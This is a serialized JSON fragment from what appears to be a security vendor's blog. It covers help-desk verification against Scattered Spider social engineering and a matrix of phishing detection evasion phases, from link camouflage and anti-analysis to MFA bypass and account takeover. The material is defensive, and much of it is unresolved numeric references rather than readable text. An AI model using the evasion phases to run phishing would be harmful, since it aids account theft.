high-profile attacks — including its most recent against UK retailers Marks & Spencer’s and the Co-op — has prompted many security teams to reassess the verification processes used by their IT help desks when an employee requests an MFA reset or access to sensitive applications. ",[],{},{"nodeType":178,"data":88083,"content":88084},{},[88085],{"nodeType":173,"value":88086,"marks":88087,"data":88088},"Initial guidance from across the industry included the use of call-back verification for any MFA or credential changes requested by an employee. However, Scattered Spider are also known to use SIM-swapping to trick mobile carriers into transferring a victim’s phone number to a SIM card controlled by the attacker - thereby allowing them to intercept verification calls. ",[],{},{"nodeType":169,"data":88090,"content":88091},{},[88092],{"nodeType":173,"value":88093,"marks":88094,"data":88095},"Simple verification using your employees’ browsers",[],{},{"nodeType":178,"data":88097,"content":88098},{},[88099],{"nodeType":173,"value":88100,"marks":88101,"data":88102},"Push already provides several controls that directly align to the other TTPs used by Scattered Spider. They include detecting stolen credentials, cloned login pages, AitM toolkits and compromised IdP sessions. ",[],{},{"nodeType":178,"data":88104,"content":88105},{},[88106,88110,88119],{"nodeType":173,"value":88107,"marks":88108,"data":88109},"(BTW, if this piques your interest, you can ",[],{},{"nodeType":186,"data":88111,"content":88113},{"uri":88112},"https://pushsecurity.com/resources?type=webinar#content",[88114],{"nodeType":173,"value":88115,"marks":88116,"data":88118},"stream our latest webinar",[88117],{"type":194},{},{"nodeType":173,"value":88120,"marks":88121,"data":88122}," where we deep-dive into Scattered Spider, how their TTPs are evolving in 2025, and what Push is doing to protect organizations against them.) ",[],{},{"nodeType":178,"data":88124,"content":88125},{},[88126],{"nodeType":173,"value":88127,"marks":88128,"data":88129},"But to provide our customers with an additional layer of defense against the Scattered Spider attack chain, we wanted to see how we could make it harder for attackers to socially engineer IT help desks into gaining access to IdP systems and sensitive apps.",[],{},{"nodeType":178,"data":88131,"content":88132},{},[88133],{"nodeType":173,"value":88134,"marks":88135,"data":88136},"As so often is the case, the answer was staring us right in the face - we can use our browser extension. By placing a verification code in the details tray of every employees’ Push extension, they can use that to verify their identity with their help desk team.",[],{},{"nodeType":312,"data":88138,"content":88142},{"target":88139},{"sys":88140},{"id":88141,"type":317,"linkType":318},"4hRJVGqKGyOHJ8NSsQYWGP",[],{"nodeType":169,"data":88144,"content":88145},{},[88146],{"nodeType":173,"value":88147,"marks":88148,"data":88149},"Get started today!",[],{},{"nodeType":178,"data":88151,"content":88152},{},[88153],{"nodeType":173,"value":88154,"marks":88155,"data":88156},"Employee verification codes is a Labs feature, which means it’s available on an early-access basis. We're particularly interested in hearing your feedback on how to develop this feature further.",[],{},{"nodeType":178,"data":88158,"content":88159},{},[88160,88163,88167,88170,88174],{"nodeType":173,"value":65787,"marks":88161,"data":88162},[],{},{"nodeType":173,"value":2789,"marks":88164,"data":88166},[88165],{"type":370},{},{"nodeType":173,"value":65795,"marks":88168,"data":88169},[],{},{"nodeType":173,"value":65800,"marks":88171,"data":88173},[88172],{"type":370},{},{"nodeType":173,"value":65804,"marks":88175,"data":88176},[],{},{"nodeType":312,"data":88178,"content":88182},{"target":88179},{"sys":88180},{"id":88181,"type":317,"linkType":318},"6TyqP2eOmalIF6RRoe476Y",[],{"nodeType":178,"data":88184,"content":88185},{},[88186,88190,88198],{"nodeType":173,"value":88187,"marks":88188,"data":88189},"If you’d like to find out more about this feature, and the other ways Push is stopping identity attacks in the browser, ",[],{},{"nodeType":186,"data":88191,"content":88192},{"uri":473},[88193],{"nodeType":173,"value":88194,"marks":88195,"data":88197},"book a demo",[88196],{"type":194},{},{"nodeType":173,"value":88199,"marks":88200,"data":88201}," with one of our team. ",[],{},{"nodeType":312,"data":88203,"content":88207},{"target":88204},{"sys":88205},{"id":88206,"type":317,"linkType":318},"7xBE9MrnMy3hfwIkhLhNhQ",[],{"nodeType":178,"data":88209,"content":88210},{},[88211],{"nodeType":173,"value":37,"marks":88212,"data":88213},[],{},"Push's new Employee Identity Verification Codes feature is a simple way for your help desk to confirm they’re talking to someone from your organization.\n","2025-06-19T00:00:00.000Z",{"items":88217},[88218],{"sys":88219,"name":26137},{"id":26136},{"items":88221},[88222],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":88223},{"url":516},{"__typename":1528,"sys":88225,"content":88226,"title":46282,"synopsis":88772,"hashTags":118,"publishedDate":88773,"slug":46283,"tagsCollection":88774,"authorsCollection":88780},{"id":24126},{"json":88227},{"data":88228,"content":88229,"nodeType":165},{},[88230,88250,88257,88280,88287,88294,88301,88320,88326,88329,88337,88344,88364,88407,88450,88480,88500,88505,88508,88516,88523,88530,88537,88544,88667,88674,88677,88684,88701,88718,88721,88729,88747,88754],{"data":88231,"content":88232,"nodeType":178},{},[88233,88237,88246],{"data":88234,"marks":88235,"value":88236,"nodeType":173},{},[],"Almost two years ago, we released our ",{"data":88238,"content":88240,"nodeType":186},{"uri":88239},"https://github.com/pushsecurity/saas-attacks",[88241],{"data":88242,"marks":88243,"value":88245,"nodeType":173},{},[88244],{"type":194},"SaaS attacks matrix",{"data":88247,"marks":88248,"value":88249,"nodeType":173},{},[]," on GitHub. At the time, our research into modern attack patterns showed us that attackers were increasingly relying on cloud-native techniques, taking advantage of the shift in business IT from traditional on-premise networks to a web of third-party services accessed over the internet. ",{"data":88251,"content":88252,"nodeType":178},{},[88253],{"data":88254,"marks":88255,"value":88256,"nodeType":173},{},[],"As part of our work in maintaining and updating the SaaS attacks matrix in line with our own research and attacks in the wild, we identified that:",{"data":88258,"content":88259,"nodeType":250},{},[88260,88270],{"data":88261,"content":88262,"nodeType":254},{},[88263],{"data":88264,"content":88265,"nodeType":178},{},[88266],{"data":88267,"marks":88268,"value":88269,"nodeType":173},{},[],"The fastest growing category since day 1 has been initial access, which is entirely driven by identity-based techniques (i.e. logging into apps).",{"data":88271,"content":88272,"nodeType":254},{},[88273],{"data":88274,"content":88275,"nodeType":178},{},[88276],{"data":88277,"marks":88278,"value":88279,"nodeType":173},{},[],"Phishing in various forms is the most widely used, and generally effective, of all the initial access techniques we encounter. ",{"data":88281,"content":88282,"nodeType":178},{},[88283],{"data":88284,"marks":88285,"value":88286,"nodeType":173},{},[],"It’s increasingly difficult to reflect a lot of the research we’re doing within the parameters of the SaaS attacks matrix when attackers are doing so much (and to varying levels) in how they architect their phishing sites, distribute links and lures, and find novel ways around authentication and access controls. ",{"data":88288,"content":88289,"nodeType":178},{},[88290],{"data":88291,"marks":88292,"value":88293,"nodeType":173},{},[],"Equally, while there’s a huge amount of valuable research and deep-dive analysis of how individual phishing kits are behaving produced by security firms, there’s a gap in how we’re bringing together this knowledge and understanding the broad strokes of why and how phishing attacks are still so successful.  ",{"data":88295,"content":88296,"nodeType":178},{},[88297],{"data":88298,"marks":88299,"value":88300,"nodeType":173},{},[],"We come across so many phishing attacks on a daily basis that it’s impossible to write a deep-dive teardown on every one — and to some extent it wouldn’t be useful to do so. What’s arguably more valuable is understanding the patterns and commonalities across phishing campaigns that can help us to understand, generally, how malicious tooling and tradecraft is evolving. ",{"data":88302,"content":88303,"nodeType":178},{},[88304,88308,88316],{"data":88305,"marks":88306,"value":88307,"nodeType":173},{},[],"So, we decided to ",{"data":88309,"content":88310,"nodeType":186},{"uri":24215},[88311],{"data":88312,"marks":88313,"value":88315,"nodeType":173},{},[88314],{"type":194},"create a new resource",{"data":88317,"marks":88318,"value":88319,"nodeType":173},{},[]," giving phishing the space to breathe that it deserves. ",{"data":88321,"content":88325,"nodeType":312},{"target":88322},{"sys":88323},{"id":88324,"type":317,"linkType":318},"7rK8RR8KKQ9DbBouZKnjs6",[],{"data":88327,"content":88328,"nodeType":231},{},[],{"data":88330,"content":88331,"nodeType":169},{},[88332],{"data":88333,"marks":88334,"value":88336,"nodeType":173},{},[88335],{"type":370},"How phishing has evolved",{"data":88338,"content":88339,"nodeType":178},{},[88340],{"data":88341,"marks":88342,"value":88343,"nodeType":173},{},[],"It’s easy to write off phishing as unsophisticated and simplistic, particularly when we think back to the first generation of phishing attacks — static HTML pages purely designed to steal your username and password, linked directly from an email. ",{"data":88345,"content":88346,"nodeType":178},{},[88347,88351,88360],{"data":88348,"marks":88349,"value":88350,"nodeType":173},{},[],"Modern phishing has changed a lot in the past decade or so. ",{"data":88352,"content":88354,"nodeType":186},{"uri":88353},"https://phishing-techniques.pushsecurity.com/techniques/aitm-phishing/",[88355],{"data":88356,"marks":88357,"value":88359,"nodeType":173},{},[88358],{"type":194},"MFA-bypassing  Attacker-in-the-Middle (AitM) kits",{"data":88361,"marks":88362,"value":88363,"nodeType":173},{},[]," are table stakes — anyone can pick up a copy of Evilginx and immediately blow past most email and network security solutions on the market.  ",{"data":88365,"content":88366,"nodeType":178},{},[88367,88371,88379,88383,88391,88395,88403],{"data":88368,"marks":88369,"value":88370,"nodeType":173},{},[],"But the most sophisticated attacks — the ones that usually hit the headlines in the form of major breaches — are doing much more than this. The latest generation of fully customized AitM phishing kits are ",{"data":88372,"content":88373,"nodeType":186},{"uri":62896},[88374],{"data":88375,"marks":88376,"value":88378,"nodeType":173},{},[88377],{"type":194},"dynamically obfuscating the code that loads the web page",{"data":88380,"marks":88381,"value":88382,"nodeType":173},{},[],", implementing ",{"data":88384,"content":88385,"nodeType":186},{"uri":50026},[88386],{"data":88387,"marks":88388,"value":88390,"nodeType":173},{},[88389],{"type":194},"bot protection through custom CAPTCHA",{"data":88392,"marks":88393,"value":88394,"nodeType":173},{},[],", and using ",{"data":88396,"content":88397,"nodeType":186},{"uri":42062},[88398],{"data":88399,"marks":88400,"value":88402,"nodeType":173},{},[88401],{"type":194},"runtime anti-analysis features",{"data":88404,"marks":88405,"value":88406,"nodeType":173},{},[],", making them increasingly difficult to detect by the tools most enterprises are using to combat the problem. ",{"data":88408,"content":88409,"nodeType":178},{},[88410,88414,88421,88425,88434,88438,88446],{"data":88411,"marks":88412,"value":88413,"nodeType":173},{},[],"The techniques used by attackers to deliver phishing lures are also more sophisticated. Groups like Scattered Spider have been seen using ",{"data":88415,"content":88416,"nodeType":186},{"uri":8043},[88417],{"data":88418,"marks":88419,"value":8046,"nodeType":173},{},[88420],{"type":194},{"data":88422,"marks":88423,"value":88424,"nodeType":173},{},[]," techniques, delivering phishing links via paid Google ads, while phishing campaigns are frequently encountered in ",{"data":88426,"content":88428,"nodeType":186},{"uri":88427},"https://phishing-techniques.pushsecurity.com/techniques/instant-messenger/",[88429],{"data":88430,"marks":88431,"value":88433,"nodeType":173},{},[88432],{"type":194},"IM apps",{"data":88435,"marks":88436,"value":88437,"nodeType":173},{},[]," (such as Slack and Teams), as well as ",{"data":88439,"content":88440,"nodeType":186},{"uri":58195},[88441],{"data":88442,"marks":88443,"value":88445,"nodeType":173},{},[88444],{"type":194},"public messaging services",{"data":88447,"marks":88448,"value":88449,"nodeType":173},{},[]," like LinkedIn messenger and Reddit — bypassing email altogether. ",{"data":88451,"content":88452,"nodeType":178},{},[88453,88457,88466,88470,88477],{"data":88454,"marks":88455,"value":88456,"nodeType":173},{},[],"The latest trends indicate that attackers are responding to increasingly hardened IdP/SSO configuration by using alternative phishing techniques that circumvent MFA and passkeys, either by ",{"data":88458,"content":88460,"nodeType":186},{"uri":88459},"https://phishing-techniques.pushsecurity.com/techniques/mfa-downgrade/",[88461],{"data":88462,"marks":88463,"value":88465,"nodeType":173},{},[88464],{"type":194},"downgrading to a backup (less secure) authentication method",{"data":88467,"marks":88468,"value":88469,"nodeType":173},{},[],", or sidestepping the legitimate auth process entirely through methods like ",{"data":88471,"content":88472,"nodeType":186},{"uri":8088},[88473],{"data":88474,"marks":88475,"value":8091,"nodeType":173},{},[88476],{"type":194},{"data":88478,"marks":88479,"value":197,"nodeType":173},{},[],{"data":88481,"content":88482,"nodeType":178},{},[88483,88487,88496],{"data":88484,"marks":88485,"value":88486,"nodeType":173},{},[],"Attackers have also realized how much valuable data exists in Shadow SaaS highlighted by major SaaS breaches impacting apps like Snowflake. This is driving ",{"data":88488,"content":88490,"nodeType":186},{"uri":88489},"https://phishing-techniques.pushsecurity.com/techniques/saas-admins/",[88491],{"data":88492,"marks":88493,"value":88495,"nodeType":173},{},[88494],{"type":194},"broader targeting against apps like Slack, Mailchimp, Postman, GitHub, and other commonly-used business apps directly",{"data":88497,"marks":88498,"value":88499,"nodeType":173},{},[]," — bypassing IdPs (MS, Google, Okta, etc.) that typically have more robust authentication controls in place.",{"data":88501,"content":88504,"nodeType":312},{"target":88502},{"sys":88503},{"id":60266,"type":317,"linkType":318},[],{"data":88506,"content":88507,"nodeType":231},{},[],{"data":88509,"content":88510,"nodeType":169},{},[88511],{"data":88512,"marks":88513,"value":88515,"nodeType":173},{},[88514],{"type":370},"Using the phishing detection evasion techniques matrix",{"data":88517,"content":88518,"nodeType":178},{},[88519],{"data":88520,"marks":88521,"value":88522,"nodeType":173},{},[],"With so much attacker innovation happening in the phishing space, it’s tricky for security teams and solution vendors to have a big picture view of the subtle changes attackers are making to their phishing attacks, and precisely why they’re doing it — or more specifically, which detection techniques they’re evading. ",{"data":88524,"content":88525,"nodeType":178},{},[88526],{"data":88527,"marks":88528,"value":88529,"nodeType":173},{},[],"If you look at one of the many phishing kit teardowns found in security blogs online (including our own) it can be hard to see the wood for the trees when it comes to understanding why a phishing page behaves in the way it does — why is it behaving in this way? What control exactly is this trying to get around? ",{"data":88531,"content":88532,"nodeType":178},{},[88533],{"data":88534,"marks":88535,"value":88536,"nodeType":173},{},[],"By creating a simple framework breaking down the categories of a phishing attack into phases, each with its own specific attacker objective, we can better understand phishing kit behavior and track meaningful changes over time. This ensures that we understand how we need to adapt to as an industry in order to detect and block these attacks. ",{"data":88538,"content":88539,"nodeType":178},{},[88540],{"data":88541,"marks":88542,"value":88543,"nodeType":173},{},[],"The matrix covers the following categories:",{"data":88545,"content":88546,"nodeType":250},{},[88547,88562,88577,88592,88607,88622,88637,88652],{"data":88548,"content":88549,"nodeType":254},{},[88550],{"data":88551,"content":88552,"nodeType":178},{},[88553,88558],{"data":88554,"marks":88555,"value":88557,"nodeType":173},{},[88556],{"type":370},"Phase 1: Targeting",{"data":88559,"marks":88560,"value":88561,"nodeType":173},{},[]," — Identifying apps and users to evade security controls and achieve the shortest time-to-impact of a phishing attack. ",{"data":88563,"content":88564,"nodeType":254},{},[88565],{"data":88566,"content":88567,"nodeType":178},{},[88568,88573],{"data":88569,"marks":88570,"value":88572,"nodeType":173},{},[88571],{"type":370},"Phase 2: Link delivery",{"data":88574,"marks":88575,"value":88576,"nodeType":173},{},[]," — Deliver links using phishing vectors that evade traditional security controls. ",{"data":88578,"content":88579,"nodeType":254},{},[88580],{"data":88581,"content":88582,"nodeType":178},{},[88583,88588],{"data":88584,"marks":88585,"value":88587,"nodeType":173},{},[88586],{"type":370},"Phase 3: Link camouflage",{"data":88589,"marks":88590,"value":88591,"nodeType":173},{},[]," — Masking malicious links to prevent detection at the email, network proxy, or safe browsing layer. ",{"data":88593,"content":88594,"nodeType":254},{},[88595],{"data":88596,"content":88597,"nodeType":178},{},[88598,88603],{"data":88599,"marks":88600,"value":88602,"nodeType":173},{},[88601],{"type":370},"Phase 4: TI evasion ",{"data":88604,"marks":88605,"value":88606,"nodeType":173},{},[],"— Preventing TI feeds from flagging and blocking known-bad domains by masking or changing elements likely to be flagged.",{"data":88608,"content":88609,"nodeType":254},{},[88610],{"data":88611,"content":88612,"nodeType":178},{},[88613,88618],{"data":88614,"marks":88615,"value":88617,"nodeType":173},{},[88616],{"type":370},"Phase 5: Anti-analysis",{"data":88619,"marks":88620,"value":88621,"nodeType":173},{},[]," — Techniques to defeat automated “sandbox” analysis tools by preventing security teams and bots from accessing the page.",{"data":88623,"content":88624,"nodeType":254},{},[88625],{"data":88626,"content":88627,"nodeType":178},{},[88628,88633],{"data":88629,"marks":88630,"value":88632,"nodeType":173},{},[88631],{"type":370},"Phase 6: Page obfuscation",{"data":88634,"marks":88635,"value":88636,"nodeType":173},{},[]," — Obfuscating page elements to break detection signatures analysing page content and code. ",{"data":88638,"content":88639,"nodeType":254},{},[88640],{"data":88641,"content":88642,"nodeType":178},{},[88643,88648],{"data":88644,"marks":88645,"value":88647,"nodeType":173},{},[88646],{"type":370},"Phase 7: Defeat MFA & CA",{"data":88649,"marks":88650,"value":88651,"nodeType":173},{},[]," — Defeat authentication and access controls in order to successfully execute the phishing attack.",{"data":88653,"content":88654,"nodeType":254},{},[88655],{"data":88656,"content":88657,"nodeType":178},{},[88658,88663],{"data":88659,"marks":88660,"value":88662,"nodeType":173},{},[88661],{"type":370},"Phase 8: Account takeover",{"data":88664,"marks":88665,"value":88666,"nodeType":173},{},[]," — Achieve a form of account takeover and conclude the identity attack, enabling further exploitation to take place.",{"data":88668,"content":88669,"nodeType":178},{},[88670],{"data":88671,"marks":88672,"value":88673,"nodeType":173},{},[],"Combining techniques and approaches from these categories is what enables attackers to bypass the majority of phishing detection controls they encounter today. You typically find that the more advanced the phishing kit / attacker, the more techniques they’ll leverage. And as phishing infrastructure becomes increasingly templated and commodified with as-a-Service or for-hire models, the average phishing attack will employ more of these measures to counter security controls. ",{"data":88675,"content":88676,"nodeType":231},{},[],{"data":88678,"content":88679,"nodeType":169},{},[88680],{"data":88681,"marks":88682,"value":18605,"nodeType":173},{},[88683],{"type":370},{"data":88685,"content":88686,"nodeType":178},{},[88687,88690,88698],{"data":88688,"marks":88689,"value":37,"nodeType":173},{},[],{"data":88691,"content":88692,"nodeType":186},{"uri":24215},[88693],{"data":88694,"marks":88695,"value":88697,"nodeType":173},{},[88696],{"type":194},"You can find the matrix here.",{"data":88699,"marks":88700,"value":37,"nodeType":173},{},[],{"data":88702,"content":88703,"nodeType":178},{},[88704,88708,88715],{"data":88705,"marks":88706,"value":88707,"nodeType":173},{},[],"If you want to learn more about the research that led us to this point, and our take on how and why phishing attacks have evolved, ",{"data":88709,"content":88710,"nodeType":186},{"uri":70840},[88711],{"data":88712,"marks":88713,"value":88714,"nodeType":173},{},[],"you can also check out our latest whitepaper. ",{"data":88716,"marks":88717,"value":37,"nodeType":173},{},[],{"data":88719,"content":88720,"nodeType":231},{},[],{"data":88722,"content":88723,"nodeType":169},{},[88724],{"data":88725,"marks":88726,"value":88728,"nodeType":173},{},[88727],{"type":370},"Get involved!",{"data":88730,"content":88731,"nodeType":178},{},[88732,88736,88743],{"data":88733,"marks":88734,"value":88735,"nodeType":173},{},[],"Like the ",{"data":88737,"content":88738,"nodeType":186},{"uri":88239},[88739],{"data":88740,"marks":88741,"value":88742,"nodeType":173},{},[],"SaaS attack matrix",{"data":88744,"marks":88745,"value":88746,"nodeType":173},{},[],", we’d love to see the security community using and helping us to maintain this resource to ensure it stays up to date with techniques as they evolve. ",{"data":88748,"content":88749,"nodeType":178},{},[88750],{"data":88751,"marks":88752,"value":88753,"nodeType":173},{},[],"Unlike the SaaS matrix, which we’ve seen mostly leveraged by offensive security practitioners, phishing detection evasion techniques are most useful to blue teamers looking to assess current detection capabilities and understand why certain attacks got through existing defenses. ",{"data":88755,"content":88756,"nodeType":178},{},[88757,88761,88769],{"data":88758,"marks":88759,"value":88760,"nodeType":173},{},[],"If you’d like to add techniques you’ve observed or examples that you think demonstrate them, ",{"data":88762,"content":88764,"nodeType":186},{"uri":88763},"https://github.com/pushsecurity/phishing-techniques",[88765],{"data":88766,"marks":88767,"value":88768,"nodeType":173},{},[],"get involved on GitHub!",{"data":88770,"marks":88771,"value":37,"nodeType":173},{},[],"Introducing our latest resource for security teams breaking down the techniques that modern phishing attacks are using to evade detection. ","2025-08-06T00:00:00.000Z",{"items":88775},[88776,88778],{"sys":88777,"name":509},{"id":508},{"sys":88779,"name":505},{"id":504},{"items":88781},[88782],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":88783},{"url":13981},{"items":88785},[88786],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":88787},{"url":1496},{"json":88789,"links":89461},{"nodeType":165,"data":88790,"content":88791},{},[88792,88798,88828,88834,88839,88845,88871,88877,88882,88885,88892,88898,88904,88952,88968,88978,88984,88989,88992,88999,89012,89017,89023,89028,89034,89064,89069,89072,89079,89085,89091,89200,89205,89231,89237,89240,89247,89253,89259,89296,89319,89325,89392,89397,89400,89407,89413,89429,89432,89439,89445],{"nodeType":178,"data":88793,"content":88794},{},[88795],{"nodeType":173,"value":73719,"marks":88796,"data":88797},[],{},{"nodeType":250,"data":88799,"content":88800},{},[88801,88810,88819],{"nodeType":254,"data":88802,"content":88803},{},[88804],{"nodeType":178,"data":88805,"content":88806},{},[88807],{"nodeType":173,"value":73732,"marks":88808,"data":88809},[],{},{"nodeType":254,"data":88811,"content":88812},{},[88813],{"nodeType":178,"data":88814,"content":88815},{},[88816],{"nodeType":173,"value":73742,"marks":88817,"data":88818},[],{},{"nodeType":254,"data":88820,"content":88821},{},[88822],{"nodeType":178,"data":88823,"content":88824},{},[88825],{"nodeType":173,"value":73752,"marks":88826,"data":88827},[],{},{"nodeType":178,"data":88829,"content":88830},{},[88831],{"nodeType":173,"value":73759,"marks":88832,"data":88833},[],{},{"nodeType":312,"data":88835,"content":88838},{"target":88836},{"sys":88837},{"id":27027,"type":317,"linkType":318},[],{"nodeType":178,"data":88840,"content":88841},{},[88842],{"nodeType":173,"value":73771,"marks":88843,"data":88844},[],{},{"nodeType":178,"data":88846,"content":88847},{},[88848,88851,88858,88861,88868],{"nodeType":173,"value":73778,"marks":88849,"data":88850},[],{},{"nodeType":186,"data":88852,"content":88853},{"uri":819},[88854],{"nodeType":173,"value":73785,"marks":88855,"data":88857},[88856],{"type":194},{},{"nodeType":173,"value":73790,"marks":88859,"data":88860},[],{},{"nodeType":186,"data":88862,"content":88863},{"uri":73795},[88864],{"nodeType":173,"value":73798,"marks":88865,"data":88867},[88866],{"type":194},{},{"nodeType":173,"value":73803,"marks":88869,"data":88870},[],{},{"nodeType":178,"data":88872,"content":88873},{},[88874],{"nodeType":173,"value":73810,"marks":88875,"data":88876},[],{},{"nodeType":312,"data":88878,"content":88881},{"target":88879},{"sys":88880},{"id":73817,"type":317,"linkType":318},[],{"nodeType":231,"data":88883,"content":88884},{},[],{"nodeType":169,"data":88886,"content":88887},{},[88888],{"nodeType":173,"value":73826,"marks":88889,"data":88891},[88890],{"type":370},{},{"nodeType":178,"data":88893,"content":88894},{},[88895],{"nodeType":173,"value":73834,"marks":88896,"data":88897},[],{},{"nodeType":178,"data":88899,"content":88900},{},[88901],{"nodeType":173,"value":73841,"marks":88902,"data":88903},[],{},{"nodeType":178,"data":88905,"content":88906},{},[88907,88910,88914,88917,88921,88924,88928,88931,88935,88938,88942,88945,88949],{"nodeType":173,"value":73848,"marks":88908,"data":88909},[],{},{"nodeType":173,"value":73852,"marks":88911,"data":88913},[88912],{"type":370},{},{"nodeType":173,"value":2936,"marks":88915,"data":88916},[],{},{"nodeType":173,"value":73860,"marks":88918,"data":88920},[88919],{"type":370},{},{"nodeType":173,"value":3107,"marks":88922,"data":88923},[],{},{"nodeType":173,"value":73868,"marks":88925,"data":88927},[88926],{"type":370},{},{"nodeType":173,"value":3107,"marks":88929,"data":88930},[],{},{"nodeType":173,"value":73876,"marks":88932,"data":88934},[88933],{"type":370},{},{"nodeType":173,"value":3107,"marks":88936,"data":88937},[],{},{"nodeType":173,"value":73884,"marks":88939,"data":88941},[88940],{"type":370},{},{"nodeType":173,"value":73889,"marks":88943,"data":88944},[],{},{"nodeType":173,"value":4806,"marks":88946,"data":88948},[88947],{"type":370},{},{"nodeType":173,"value":73897,"marks":88950,"data":88951},[],{},{"nodeType":178,"data":88953,"content":88954},{},[88955,88958,88965],{"nodeType":173,"value":73904,"marks":88956,"data":88957},[],{},{"nodeType":186,"data":88959,"content":88960},{"uri":819},[88961],{"nodeType":173,"value":27706,"marks":88962,"data":88964},[88963],{"type":194},{},{"nodeType":173,"value":73915,"marks":88966,"data":88967},[],{},{"nodeType":178,"data":88969,"content":88970},{},[88971,88974],{"nodeType":173,"value":73922,"marks":88972,"data":88973},[],{},{"nodeType":173,"value":73926,"marks":88975,"data":88977},[88976],{"type":370},{},{"nodeType":178,"data":88979,"content":88980},{},[88981],{"nodeType":173,"value":73934,"marks":88982,"data":88983},[],{},{"nodeType":312,"data":88985,"content":88988},{"target":88986},{"sys":88987},{"id":73941,"type":317,"linkType":318},[],{"nodeType":231,"data":88990,"content":88991},{},[],{"nodeType":169,"data":88993,"content":88994},{},[88995],{"nodeType":173,"value":73950,"marks":88996,"data":88998},[88997],{"type":370},{},{"nodeType":178,"data":89000,"content":89001},{},[89002,89005,89009],{"nodeType":173,"value":73958,"marks":89003,"data":89004},[],{},{"nodeType":173,"value":73962,"marks":89006,"data":89008},[89007],{"type":370},{},{"nodeType":173,"value":73967,"marks":89010,"data":89011},[],{},{"nodeType":312,"data":89013,"content":89016},{"target":89014},{"sys":89015},{"id":73974,"type":317,"linkType":318},[],{"nodeType":178,"data":89018,"content":89019},{},[89020],{"nodeType":173,"value":73980,"marks":89021,"data":89022},[],{},{"nodeType":312,"data":89024,"content":89027},{"target":89025},{"sys":89026},{"id":73987,"type":317,"linkType":318},[],{"nodeType":178,"data":89029,"content":89030},{},[89031],{"nodeType":173,"value":73993,"marks":89032,"data":89033},[],{},{"nodeType":178,"data":89035,"content":89036},{},[89037,89040,89044,89047,89051,89054,89061],{"nodeType":173,"value":74000,"marks":89038,"data":89039},[],{},{"nodeType":173,"value":74004,"marks":89041,"data":89043},[89042],{"type":370},{},{"nodeType":173,"value":74009,"marks":89045,"data":89046},[],{},{"nodeType":173,"value":74013,"marks":89048,"data":89050},[89049],{"type":370},{},{"nodeType":173,"value":74018,"marks":89052,"data":89053},[],{},{"nodeType":186,"data":89055,"content":89056},{"uri":49783},[89057],{"nodeType":173,"value":74025,"marks":89058,"data":89060},[89059],{"type":194},{},{"nodeType":173,"value":481,"marks":89062,"data":89063},[],{},{"nodeType":312,"data":89065,"content":89068},{"target":89066},{"sys":89067},{"id":61243,"type":317,"linkType":318},[],{"nodeType":231,"data":89070,"content":89071},{},[],{"nodeType":169,"data":89073,"content":89074},{},[89075],{"nodeType":173,"value":74044,"marks":89076,"data":89078},[89077],{"type":370},{},{"nodeType":178,"data":89080,"content":89081},{},[89082],{"nodeType":173,"value":74052,"marks":89083,"data":89084},[],{},{"nodeType":178,"data":89086,"content":89087},{},[89088],{"nodeType":173,"value":74059,"marks":89089,"data":89090},[],{},{"nodeType":250,"data":89092,"content":89093},{},[89094,89113,89132,89151],{"nodeType":254,"data":89095,"content":89096},{},[89097],{"nodeType":178,"data":89098,"content":89099},{},[89100,89103,89110],{"nodeType":173,"value":37,"marks":89101,"data":89102},[],{},{"nodeType":186,"data":89104,"content":89105},{"uri":4492},[89106],{"nodeType":173,"value":74078,"marks":89107,"data":89109},[89108],{"type":194},{},{"nodeType":173,"value":74083,"marks":89111,"data":89112},[],{},{"nodeType":254,"data":89114,"content":89115},{},[89116],{"nodeType":178,"data":89117,"content":89118},{},[89119,89122,89129],{"nodeType":173,"value":74093,"marks":89120,"data":89121},[],{},{"nodeType":186,"data":89123,"content":89124},{"uri":49783},[89125],{"nodeType":173,"value":74100,"marks":89126,"data":89128},[89127],{"type":194},{},{"nodeType":173,"value":1477,"marks":89130,"data":89131},[],{},{"nodeType":254,"data":89133,"content":89134},{},[89135],{"nodeType":178,"data":89136,"content":89137},{},[89138,89141,89148],{"nodeType":173,"value":74114,"marks":89139,"data":89140},[],{},{"nodeType":186,"data":89142,"content":89143},{"uri":832},[89144],{"nodeType":173,"value":4519,"marks":89145,"data":89147},[89146],{"type":194},{},{"nodeType":173,"value":53584,"marks":89149,"data":89150},[],{},{"nodeType":254,"data":89152,"content":89153},{},[89154],{"nodeType":178,"data":89155,"content":89156},{},[89157,89160,89167,89170,89177,89180,89187,89190,89197],{"nodeType":173,"value":74134,"marks":89158,"data":89159},[],{},{"nodeType":186,"data":89161,"content":89162},{"uri":59347},[89163],{"nodeType":173,"value":74141,"marks":89164,"data":89166},[89165],{"type":194},{},{"nodeType":173,"value":2936,"marks":89168,"data":89169},[],{},{"nodeType":186,"data":89171,"content":89172},{"uri":61610},[89173],{"nodeType":173,"value":74152,"marks":89174,"data":89176},[89175],{"type":194},{},{"nodeType":173,"value":74157,"marks":89178,"data":89179},[],{},{"nodeType":186,"data":89181,"content":89182},{"uri":19838},[89183],{"nodeType":173,"value":8091,"marks":89184,"data":89186},[89185],{"type":194},{},{"nodeType":173,"value":2936,"marks":89188,"data":89189},[],{},{"nodeType":186,"data":89191,"content":89192},{"uri":61697},[89193],{"nodeType":173,"value":74174,"marks":89194,"data":89196},[89195],{"type":194},{},{"nodeType":173,"value":74179,"marks":89198,"data":89199},[],{},{"nodeType":312,"data":89201,"content":89204},{"target":89202},{"sys":89203},{"id":27078,"type":317,"linkType":318},[],{"nodeType":178,"data":89206,"content":89207},{},[89208,89211,89218,89221,89228],{"nodeType":173,"value":74191,"marks":89209,"data":89210},[],{},{"nodeType":186,"data":89212,"content":89213},{"uri":27564},[89214],{"nodeType":173,"value":74198,"marks":89215,"data":89217},[89216],{"type":194},{},{"nodeType":173,"value":74203,"marks":89219,"data":89220},[],{},{"nodeType":186,"data":89222,"content":89223},{"uri":819},[89224],{"nodeType":173,"value":27706,"marks":89225,"data":89227},[89226],{"type":194},{},{"nodeType":173,"value":74214,"marks":89229,"data":89230},[],{},{"nodeType":178,"data":89232,"content":89233},{},[89234],{"nodeType":173,"value":74221,"marks":89235,"data":89236},[],{},{"nodeType":231,"data":89238,"content":89239},{},[],{"nodeType":169,"data":89241,"content":89242},{},[89243],{"nodeType":173,"value":74231,"marks":89244,"data":89246},[89245],{"type":370},{},{"nodeType":178,"data":89248,"content":89249},{},[89250],{"nodeType":173,"value":74239,"marks":89251,"data":89252},[],{},{"nodeType":178,"data":89254,"content":89255},{},[89256],{"nodeType":173,"value":74246,"marks":89257,"data":89258},[],{}